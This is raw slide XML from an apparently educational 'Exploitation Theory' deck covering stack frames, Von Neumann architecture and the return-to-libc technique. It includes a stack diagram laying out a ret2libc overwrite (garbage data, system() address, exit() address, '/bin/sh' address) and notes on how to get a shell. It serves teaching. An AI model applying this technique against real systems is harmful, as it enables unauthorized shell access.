          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pushes in order on the stack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>first the arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>then return address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>then base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Shape 602"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879000" y="2783488"/>
            <a:ext cx="1807800" cy="2682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a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vuln buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stack data .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ret addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument2 ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="603" name="Shape 603"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3312375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="604" name="Shape 604"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3693375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="605" name="Shape 605"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4074375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="606" name="Shape 606"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4531575"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="607" name="Shape 607"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4988775"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Shape 608"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336200" y="2484275"/>
            <a:ext cx="1376100" cy="256500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Shape 609"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="5586700"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Shape 610"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="2233900"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOW MEMORY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Exploitation Theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Shape 126"/>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b="1" lang="en" u="sng"/>
              <a:t>VON NEUMANN ARCHITECTURE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>most popular system model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>45+ years old and going strong</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cannot distinguish between data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>major reason for so much hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>instructions and data stores in same </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>allows for self modifying code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>b/c old machines were hard to set up!!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>took weeks to set up an old ENIAC!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>systems are different now, but much much more </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="1400" u="sng"/>
              <a:t>complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The ability to treat instructions as data </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>assemblers, compilers, and other automated programming tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FANTASTIC READ: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.nytimes.com/2012/10/30/science/rethinking-the-computer-at-80.html?pagewanted=all&amp;_r=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668994" y="1704688"/>
            <a:ext cx="3017806" cy="2210509"/>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Shape 615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8700800" y="4093800"/>
            <a:ext cx="209925" cy="1376275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="55051" w="8397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8397" y="7931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8397" y="45254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466" y="55051"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Shape 616"/>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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Shape 617"/>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b="1" lang="en"/>
              <a:t>Hurdles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>finding "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>not uncommon, and can be found  with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a memory analyzer (i.e. memfetch)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can be an environment variable!   :D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>figuring out how to pass it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>arguments get pushed onto the stack in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reverse order</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>pass a pointer to "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" or put it there?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>usually easier to pass a pointer!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>getting the vulnerable process to exit cleanly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>by calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>() returns, it will point here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Shape 618"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879000" y="2783488"/>
            <a:ext cx="1807800" cy="2682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a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>garbage data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exit() addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/bin/sh addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
